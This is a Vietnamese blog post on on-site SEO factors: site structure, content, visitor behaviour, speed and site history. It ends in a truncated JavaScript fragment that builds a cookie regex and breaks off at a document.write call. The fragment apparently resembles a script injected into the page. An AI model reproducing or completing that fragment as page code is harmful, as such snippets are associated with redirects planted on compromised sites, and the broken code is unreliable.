Nội lực của website và SEO

Trong nhiều bài viết về SEO, tôi đã phân tích nhiều yếu tố ảnh hưởng lớn đến kết quả của quá trình SEO. Trong bài viết này tôi sẽ nói chi tiết hơn về các yếu tố nội lực ảnh hưởng đến quá trình SEO, để các bạn có thể hiểu website của mình đang có sức mạnh như thế nào trên internet (dịch vụ SEO).

I. Các yếu tố nội lực của website bao gồm những gì?

Thiết kế website

– Những yếu tố nội lực của website là các yếu tố được tạo ra trong website, từ lúc thiết kế đến khi vận hành, với cái “Thuật toán chim cánh cụt” hiện nay thì các yếu tố nội lực của website lại càng ảnh hưởng mạnh hơn nữa đến quá trình SEO.

– Các yếu tố nội lực của website có thể do chính bạn tạo ra hoặc do người đọc, khách hàng của bạn tạo ra. Các yếu tố nội lực này bao gồm:

+ Cấu trúc website.

+ Nội dung của website.

+ Hành động của người truy cập trong website.

+ Tốc độ của Website.

+ Lịch sử của website.

– Trong bài viết này chúng ta cùng phân tích các yếu tố này. Các bạn có thể comment để giúp bài viết hoàn thiện hơn.

II.  Cấu trúc website.

– Cấu trúc website chính việc bạn tổ chức, cấu trúc các thư mục của website nhằm giúp cho người truy cập website có thể đọc các bài viết cùng chủ đề hay chính là tổ chức bài viết một cách khoa học hơn. Việc cấu trúc website một cách khoa học cũng giúp cho các công cụ tìm kiếm đánh giá website  tốt hơn về mặt nội dung.

– Đặc biệt là khi bạn cấu trúc website hợp lý bạn có thể nhốt các con bot của các công cụ tìm kiếm trong website lâu hơn rất nhiều, điều này cực kì có lợi trong việc SEO.

– Viêc cấu trúc danh mục website cũng quyết định bộ khung website chứa đựng các phần nội dung có thuận lợi hơn cho google bot tiếp cận chúng hay không. Sẽ rất bất lợi khi bạn làm tốt nội dung cho website mà không có cấu trúc khoa học để google bot có thể tiếp cận các nội dung này.

III. Nội dung website.

– Nội dung website chính là những gì mà bạn cung cấp cho người dùng, có thể là một ứng dụng nền web, bài viết, hình ảnh. Những diều đó sẽ tạo nên hành động của người duyệt webs. Truy cập mới, truy cập lại, tỉ lệ bỏ qua của người dùng đểu được quyết định bởi nội dung bạn cung cấp.

– Khi bạn có nội dung tốt, thu hút được người dùng, thì chính người dùng sẽ tạo lại nội dung cho bạn trên nền cơ sở web động bằng các comment, các trang cá nhân của họ …v…..v…v.

– Việc tạo lập nội dung website cũng là một cách để bạn nhốt google bot bằng các link về thư  mục, về trang chủ và bài viết liên quan hợp lý. Google bot sẽ buộc phải bò nhiều lần trong các bài viết vì mỗi bài viết của bạn đều có link nội bộ, cả hệ thống bài viết sẽ tạo thành mê cung nhốt Google bot.

IV. Hành động của người truy cập website.

– Bạn tạo ra website để phục vụ người truy cập, hành động của họ chính là nhân tố quyết định sự thành bại, nổi bật hay chìm nghỉm website của bạn trong đại dương số. Làm thế nào để tạo ra nội dung thu hút người dùng chính là việc bạn phải nghĩ đến đầu tiên khi tạo lập website.

– Các nội dung như ứng dụng webs sẽ cung cấp công cụ cho người dùng sử dụng, phần lớn người dùng sẽ nán lại lâu ở các website này nếu đó là công cụ mà họ cần, nhưng các ứng dụng webs sẽ khó tạo ra nguồn nội dung phong phú giúp website của bạn được đánh giá cao.

– Các nội dung như bài viết ảnh sẽ được người dùng quan tâm nhiều hay ít do chính nội dung của nó, chúng thường được tạo ra trên các nguồn web động như wordpress, Facebook ….v….v…. Vì thế người dùng cũng có thể đóng góp nội dung cho website. Khi một website tạo ra được các mối quan hệ giữa website và người dùng, người dùng và người dùng trong website thì nó sẽ cực kì mạnh.

V. Tốc độ của website.

– Nhiều người thường không quan tâm lắm về tốc độ của website. Họ thường chọn các hostting free hoặc hosting giá rẻ của nước ngoài. Điều đó là một suy nghĩ sai lầm khi phát triển website.

– Website của bạn nhanh sẽ giúp người dùng đọc được nhiều bài viết của bạn hơn, họ có thể mở nhiều cửa sổ website của bạn hơn, tìm kiếm thông tin dễ dàng hơn trên website của bạn.

– Website có tốc độ hoạt động nhanh cũng giúp google bot bò vào được nhiều URL hơn, google cũng đánh giá cao hơn website của bạn vì điều đó có lợi cho người dùng.

VI. Lịch sử phát triển website.

– Lịch sử phát triển của website là quá trình hoạt động, mở rộng của website. Bất kì sự bất thường nào của website cũng sẽ bị google hoặc các công cụ tìm kiếm khác điều tra một cách kĩ lưỡng nhờ các thuật toán phân tích. Một sự kiện bất thường như số lượng bài viết tăng đột biến, nhiễm virus và mã độc ….v….v… sẽ là lí lịch đen trong việc đánh giá website của công cụ tìm kiếm.

– Website càng có lịch sử lâu dài càng có lợi trong quá trình SEO.

Bàn quyền thuộc pridio.com

(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘